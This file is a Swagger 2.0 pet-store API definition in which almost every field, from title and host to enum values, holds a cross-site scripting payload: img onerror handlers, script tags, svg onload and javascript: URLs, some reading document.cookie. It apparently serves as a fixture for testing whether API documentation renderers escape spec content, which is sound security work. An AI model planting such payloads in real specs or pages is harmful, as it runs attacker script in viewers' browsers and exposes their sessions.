swagger: "2.0"
info:
  description: "xss: <img src=x onerror=\"javascript:alert(1)\">"
  title: "<img src=1 onerror='javascript:alert(document.domain)'>"
  version: "1.0><script>alert(1)</script>"
  x-xss-protection: "0"
  termsOfService: "javascript:alert(1)//"
externalDocs:
  description: "<svg/onload=alert(document.cookie)>"
  url: "javascript:alert(document.domain)"
host: "example.com\"><img src=x onerror=alert(1)>"
basePath: "/v2\"></script><script>alert(1)</script>"
schemes:
- "https"
paths:
  /pet:
    post:
      tags:
      - "pet\"onmouseover=\"alert(1)"
      summary: "<img src=x onerror=alert(document.domain)>"
      description: "Add a new pet to the store<script>setTimeout(function(){alert(document.domain)},2000)</script>"
      operationId: "addPet\"><script>alert(1)</script>"
      consumes:
      - "application/xml"
      produces:
      - "application/xml"
      parameters:
      - in: "body"
        name: "body\"><img src=1 onerror='alert(1)'>"
        description: "Pet object that needs to be added to the store<img src=x onerror=alert('XSS')>"
        required: true
        schema:
          $ref: "#/definitions/Pet"
      responses:
        "405":
          description: "Invalid input<script>alert(1)</script>"
definitions:
  Pet:
    type: "object"
    properties:
      name:
        type: "string"
        example: "\"><img src=x onerror=alert(1)>"
      status:
        type: "string"
        description: "pet status in the store<img src=x onerror=alert(document.cookie)>"
        enum:
        - "available\"><img src=x onerror=alert(1)>"
        - "pending"
        - "sold"
    xml:
      name: "Pet\"><script>setTimeout(function(){alert('Delayed XSS')},1500)</script>"
